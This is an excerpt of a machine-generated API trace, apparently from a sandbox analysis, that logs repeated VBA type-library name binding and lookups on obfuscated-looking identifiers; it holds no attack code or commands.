[0069.675] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_OXAAG4", lHashVal=0x102b59, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0) returned 0x0 [0069.675] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81762 | out: _Dst=0x144ec0) returned 0x0 [0069.675] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wxocoxZk", lHashVal=0x10b6ad, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b817b6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wxocoxZk") returned 9 [0069.676] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wxocoxZk", lHashVal=0x10b6ad, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b817b6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wxocoxZk") returned 9 [0069.676] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wxocoxZk", lHashVal=0x10b6ad, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.676] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wxocoxZk") returned 0x10b6ad [0069.676] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wxocoxZk" | out: _Dst="wxocoxZk") returned 0x0 [0069.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wxocoxZk") returned 9 [0069.676] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.676] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wxocoxZk", lHashVal=0x10b6ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.676] IUnknown:Release (This=0x665ba50) returned 0xd [0069.676] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.676] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wxocoxZk", lHashVal=0x10b6ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.676] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.676] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.676] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wxocoxZk", lHashVal=0x10b6ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.676] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.676] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.676] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wxocoxZk", lHashVal=0x10b6ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.676] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b817b6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wxocoxZk") returned 9 [0069.676] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wxocoxZk", lHashVal=0x10b6ad, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.676] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.677] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b817b6 | out: _Dst=0x67c2d40) returned 0x0 [0069.677] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wxocoxZk") returned 0x108e36 [0069.677] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wxocoxZk" | out: _Dst="_B_var_wxocoxZk") returned 0x0 [0069.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wxocoxZk") returned 16 [0069.677] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.677] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wxocoxZk", lHashVal=0x108e36, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.677] IUnknown:Release (This=0x665ba50) returned 0xd [0069.677] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.677] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wxocoxZk", lHashVal=0x108e36, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.677] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.677] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.677] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wxocoxZk", lHashVal=0x108e36, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.677] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.677] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.677] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wxocoxZk", lHashVal=0x108e36, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.677] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.677] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.677] IUnknown:Release (This=0x665ba50) returned 0xd [0069.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870a3e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_wxocoxZk") returned 16 [0069.677] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wxocoxZk", lHashVal=0x108e36, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x6f006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x6f006300000000, pDummy=0x0) returned 0x0 [0069.677] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b817b6 | out: _Dst=0x144ec0) returned 0x0 [0069.677] ITypeComp:RemoteBind (in: This=0x665ba60, szName="a_AUQAA_", lHashVal=0x10900e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8178a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="a_AUQAA_") returned 9 [0069.677] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="a_AUQAA_", lHashVal=0x10900e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8178a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="a_AUQAA_") returned 9 [0069.678] ITypeComp:RemoteBind (in: This=0x665bd30, szName="a_AUQAA_", lHashVal=0x10900e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.678] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="a_AUQAA_") returned 0x10900e [0069.678] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="a_AUQAA_" | out: _Dst="a_AUQAA_") returned 0x0 [0069.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="a_AUQAA_") returned 9 [0069.678] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.678] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="a_AUQAA_", lHashVal=0x10900e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.678] IUnknown:Release (This=0x665ba50) returned 0xd [0069.678] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.678] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="a_AUQAA_", lHashVal=0x10900e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.678] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.678] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.678] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="a_AUQAA_", lHashVal=0x10900e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.678] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.678] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.678] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="a_AUQAA_", lHashVal=0x10900e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.678] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8178a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="a_AUQAA_") returned 9 [0069.678] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="a_AUQAA_", lHashVal=0x10900e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.678] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.678] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8178a | out: _Dst=0x67c2d40) returned 0x0 [0069.678] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_a_AUQAA_") returned 0x106797 [0069.678] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_a_AUQAA_" | out: _Dst="_B_var_a_AUQAA_") returned 0x0 [0069.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_a_AUQAA_") returned 16 [0069.678] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.679] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_a_AUQAA_", lHashVal=0x106797, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.679] IUnknown:Release (This=0x665ba50) returned 0xd [0069.679] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.679] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_a_AUQAA_", lHashVal=0x106797, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.679] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.679] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.679] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_a_AUQAA_", lHashVal=0x106797, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.679] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.679] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.679] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_a_AUQAA_", lHashVal=0x106797, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.679] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.679] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.679] IUnknown:Release (This=0x665ba50) returned 0xd [0069.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870a6e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_a_AUQAA_") returned 16 [0069.679] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_a_AUQAA_", lHashVal=0x106797, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x51005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x51005500000000, pDummy=0x0) returned 0x0 [0069.679] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8178a | out: _Dst=0x144ec0) returned 0x0 [0069.679] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wcBBAQAx", lHashVal=0x10f163, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8180a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wcBBAQAx") returned 9 [0069.679] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wcBBAQAx", lHashVal=0x10f163, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8180a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wcBBAQAx") returned 9 [0069.679] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wcBBAQAx", lHashVal=0x10f163, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.680] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wcBBAQAx") returned 0x10f163 [0069.680] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wcBBAQAx" | out: _Dst="wcBBAQAx") returned 0x0 [0069.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wcBBAQAx") returned 9 [0069.680] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.680] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wcBBAQAx", lHashVal=0x10f163, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.680] IUnknown:Release (This=0x665ba50) returned 0xd [0069.680] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.680] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wcBBAQAx", lHashVal=0x10f163, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.680] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.680] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.680] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wcBBAQAx", lHashVal=0x10f163, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.680] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.680] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.680] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wcBBAQAx", lHashVal=0x10f163, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.680] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8180a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wcBBAQAx") returned 9 [0069.680] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wcBBAQAx", lHashVal=0x10f163, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.680] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.680] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8180a | out: _Dst=0x67c2d40) returned 0x0 [0069.680] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wcBBAQAx") returned 0x10c8ec [0069.680] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wcBBAQAx" | out: _Dst="_B_var_wcBBAQAx") returned 0x0 [0069.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wcBBAQAx") returned 16 [0069.680] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.680] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wcBBAQAx", lHashVal=0x10c8ec, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.680] IUnknown:Release (This=0x665ba50) returned 0xd [0069.680] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.680] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wcBBAQAx", lHashVal=0x10c8ec, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.681] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.681] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.681] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wcBBAQAx", lHashVal=0x10c8ec, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.681] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.681] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.681] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wcBBAQAx", lHashVal=0x10c8ec, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.681] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.681] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.681] IUnknown:Release (This=0x665ba50) returned 0xd [0069.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870a9e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_wcBBAQAx") returned 16 [0069.681] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wcBBAQAx", lHashVal=0x10c8ec, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0) returned 0x0 [0069.681] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8180a | out: _Dst=0x144ec0) returned 0x0 [0069.681] ITypeComp:RemoteBind (in: This=0x665ba60, szName="NAxUwoA", lHashVal=0x10b889, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81836, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NAxUwoA") returned 8 [0069.681] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="NAxUwoA", lHashVal=0x10b889, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81836, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NAxUwoA") returned 8 [0069.681] ITypeComp:RemoteBind (in: This=0x665bd30, szName="NAxUwoA", lHashVal=0x10b889, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.681] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NAxUwoA") returned 0x10b889 [0069.681] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="NAxUwoA" | out: _Dst="NAxUwoA") returned 0x0 [0069.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="NAxUwoA") returned 8 [0069.681] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.681] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="NAxUwoA", lHashVal=0x10b889, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.682] IUnknown:Release (This=0x665ba50) returned 0xd [0069.682] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.682] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="NAxUwoA", lHashVal=0x10b889, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.682] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.682] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.682] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="NAxUwoA", lHashVal=0x10b889, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.682] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.682] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.682] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="NAxUwoA", lHashVal=0x10b889, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.682] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81836, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NAxUwoA") returned 8 [0069.682] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="NAxUwoA", lHashVal=0x10b889, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.682] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.682] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81836 | out: _Dst=0x67c2d40) returned 0x0 [0069.682] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_NAxUwoA") returned 0x10bc0d [0069.682] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_NAxUwoA" | out: _Dst="_B_var_NAxUwoA") returned 0x0 [0069.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_NAxUwoA") returned 15 [0069.682] IUnknown:AddRef 